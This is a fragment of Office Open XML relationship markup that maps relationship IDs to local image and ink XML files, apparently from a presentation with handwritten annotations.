Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339.png"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image810.png"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink751.xml"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink759.xml"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2110.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image345.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image458.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink688.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image392.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink704.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image511.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink719.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2610.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2210.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1311.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink727.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3610.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink740.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink742.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink746.xml"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1610.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image453.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink754.xml"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink762.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink699.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image461.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink714.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2111.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink694.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image811.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink722.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2910.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink735.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1110.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink686.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink749.xml"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink757.xml"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1910.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink689.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image456.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink709.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16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9.xml"/><Relationship Id="rId299" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1101.png"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1120.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink770.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image454.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1611.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink810.xml"/><Relationship Id="rId324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink894.xml"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink905.xml"/><Relationship Id="rId366" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2110.png"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink926.xml"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3210.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink827.xml"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink834.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image740.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink855.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink784.xml"/><Relationship Id="rId268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image951.png"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1050.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image449.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink781.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1111.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink805.xml"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink889.xml"/><Relationship Id="rId335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink900.xml"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1610.png"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink921.xml"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image970.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image392.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2710.png"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink821.xml"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image690.png"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink850.xml"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image900.png"/><Relationship Id="rId279" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1000.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink771.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image610.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink800.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image490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25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1230.png"/><Relationship Id="rId346" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1110.png"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink916.xml"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image921.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2211.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink816.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image540.png"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image640.png"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink845.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image850.png"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink866.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image460.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image464.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink795.xml"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink872.xml"/><Relationship Id="rId315" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1180.png"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image611.png"/><Relationship Id="rId357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink911.xml"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1711.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink811.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink822.xml"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink840.xml"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image871.png"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image800.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink861.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image455.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink790.xml"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image961.png"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1060.png"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1130.png"/><Relationship Id="rId326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink895.xml"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink906.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink772.xml"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1211.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink806.xml"/><Relationship Id="rId368" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2210.png"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink927.xml"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3310.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink828.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink835.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image750.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink856.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image450.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink785.xml"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image913.png"/><Relationship Id="rId281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1012.png"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink890.xml"/><Relationship Id="rId337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink901.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3410.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image710.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink801.xml"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1710.png"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink922.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image393.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2810.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink823.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image700.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink851.xml"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image930.png"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image860.png"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink867.xml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45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink773.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image465.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink796.xml"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink896.xml"/><Relationship Id="rId348" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1210.png"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink917.xml"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2311.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink817.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image550.png"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image650.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink846.xml"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image881.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image812.png"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink862.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink765.xml"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink873.xml"/><Relationship Id="rId317" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1190.png"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image711.png"/><Relationship Id="rId359" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink912.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink791.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1811.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink812.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image500.png"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink841.xml"/><Relationship Id="rId370" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2310.png"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink928.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image680.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image760.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink849.xml"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink857.xml"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image890.png"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image990.png"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink881.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1100.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink774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799.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2610.png"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image971.png"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1070.png"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink883.xml"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1140.png"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1220.png"/><Relationship Id="rId328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image294.png"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1010.png"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink907.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink769.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink786.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1311.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink807.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3610.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink820.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image480.png"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink829.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink836.xml"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.png"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink915.xml"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink923.xml"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image912.png"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image530.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image630.png"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image712.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink844.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink852.xml"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image840.png"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink865.xml"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink876.xml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image" Target="../media/image463.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink794.xml"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image920.png"/><Relationship Id="rId283" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1020.png"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1170.png"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink891.xml"/><Relationship Id="rId339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink902.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image459.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink780.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image811.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink802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815.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink824.xml"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId350" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1310.png"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink910.xml"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink918.xml"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image861.png"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink931.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image394.png"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3910.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image660.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink839.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image790.png"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink860.xml"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink871.xml"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image940.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink847.xml"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image870.png"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink868.xml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329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink897.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink775.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image487.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink797.xml"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2410.png"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink818.xml"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image810.png"/><Relationship Id="rId361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink913.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image560.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image612.png"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image891.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink842.xml"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image820.png"/><Relationship Id="rId263" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink863.xml"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink874.xml"/><Relationship Id="rId319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1200.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image257.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 